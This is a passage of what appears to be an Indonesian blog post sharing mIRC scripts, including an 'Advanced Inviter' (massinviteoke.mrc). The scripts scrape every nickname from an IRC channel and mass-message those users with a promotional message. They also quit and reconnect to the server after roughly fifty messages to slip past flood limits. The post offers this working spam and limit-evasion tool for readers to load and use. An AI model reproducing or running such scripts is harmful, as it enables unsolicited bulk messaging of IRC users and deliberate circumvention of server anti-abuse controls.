echo -s * __7I__12nvite to (_1 $+ $vnick $+ _12) stoped! They were voiced in (_1 $+ $chan $+ _12)
}
on 1:quit: {
if ($nick == me) { halt } | else { write -dl1 Data/InviteList.txt | echo -s * __7I__12nvite to (_1 $+ $nick $+ _12) stoped! They quit IRC }
write -dw* $+ $nick $+ * InviteList.txt
}
on 1:nick: {
write -dw* $+ $nick $+ * Data/InviteList.txt
write Data/InviteList.txt $newnick
echo -s * __7I__12nvite to (_1 $+ $nick $+ _12) stoped! They changed there nickname to (_1 $+ $newnick $+ _12)
}
raw 401:*: {
write -dw* $+ $2 $+ * Data/InviteList.txt
echo -a * __7E__12rror sending invite to (_1 $+ $2 $+ _12) aborting
}
#ExpertInvite end
[POPUP-menubar]
Expert
.Start Spy:/enable #ExpertInvite
.Stop Spy:/disable #ExpertInvite
Berikut ini script pada mIRC 2 yang bertugas sebagai Inviter.
[REMOTE]
on 1:START: titlebar .:: MadCodes Script ::. OffLine [[ %InvitedPeople people invited ]]
on 1:CONNECT: titlebar .:: MadCodes Script ::. OnLine [[ %InvitedPeople people invited ]]
on 1:DISCONNECT: titlebar .:: MadCodes Script ::. OffLine [[ %InvitedPeople people invited ]]
[POPUP-menubar]
Start Invite:/StartInvite
Stop Invite:/timerInvite off
-
Set Message:/set %ExpertInviter.Message $$?=”Message”
[ALIASES]
/StartInvite /timerInvite 0 5 /gabung
/gabung /set %invite $read -l1 ../Data/InviteList.txt | msg %invite %ExpertInviter.Message | inc %InvitedPeople | write -dl1 ../Data/InviteList.txt
2. Advanced Inviter
Tipe inviter satu ini hampir mirip dengan xGuest, tetapi kelebihan yang satu ini adalah OpenSource dan langsung di mIRC hehehe. Jadi dapat lu kembangkan menjadi lebih baik.
Save script dibawah dengan nama massinviteoke.mrc di folder mIRC, lalu load file tersebut dari mIRC.
Credit: Script untuk Advanced Inviter (massinviteoke.mrc) bukan buatan saya (CyberMad), saya hanya menulis ulang disini. Sangat disayangkan… saya tidak mengetahui nama pembuat aslinya.
on 1:LOAD:/auser me $me
alias tanya {
if ( %tc == $null ) { set %tc $chan }
if ( %server = $null ) { /set %server $$?=”enter SERVER” }
if ( %msg != $null ) goto msg1
:msg
/set %msg $$?=” enter message”
:msg1
//echo -a 5This is your message: %msg
/set %msgok $$?=”Message okay? Y/N”
if ( %msgok == N ) { goto msg | halt }
/undang
/unset %msgok
}
alias undang {
set %tp $nopnick(%tc,0)
set %pn 1
:begin
set %p $nopnick(%tc,%pn)
/write penghuni.txt %p
inc %pn
if ( %pn >= %tp ) { goto end }
goto begin
:end
/part %tc
/pesan
}
alias pesan {
:mulai
inc %cunt1
if ( %cunt > %tp ) { .remove penghuni.txt | unset %tc | unset %tp | unset %pn | unset %p | unset %pn1 | unset %cunt | unset %cunt1 | /echo -s DONE! | /quit | halt }
set %p $read -l $+ %cunt penghuni.txt
set %FILTER3 $addtok(%FILTER3,%p,44)
if ($gettok(%FILTER3,0,44) == 4) { .msg $gettok(%FILTER3,1-4,44) %msg | unset %FILTER3 }
/echo -s 12 Msg sent to 4 $read -l $+ %cunt penghuni.txt 1 at 3 %tc 6 %cunt of %tp
inc %cunt
if ( %cunt1 == 51 ) { /timer 1 2 /unset %cunt1 | /timer 1 5 /quit leaving | /timer 1 7 /server %server | halt }
goto mulai
}
raw 401:*: { halt }
raw 403:*: { halt }
on 1:CONNECT: {
if ( %cunt == $null ) { halt }
/pesan
}
menu menubar {
<<>>
-
Join a channel (invite from this channel): /set %tc $$?=”Enter channel invite from” | /join %tc
-
Start Mass-invite: /tanya
-
End Mass-invite / Reset: /disconnect | unset %tc %tp %pn %p %cunt* | remove penghuni.txt
}
on me:JOIN:#: set %tc $chan
alias undangall {
set %tp $nick(%tc,0)
set %pn 1
:begin
set %p $nick(%tc,%pn)
/write penghuni.txt %p
inc %pn
if ( %pn >= %tp ) { goto end }
goto begin
:end
/part %tc
/pesan
}
on 1:CHAT:*: /ignore -pntik *!*@
Langganan:
Postingan (Atom)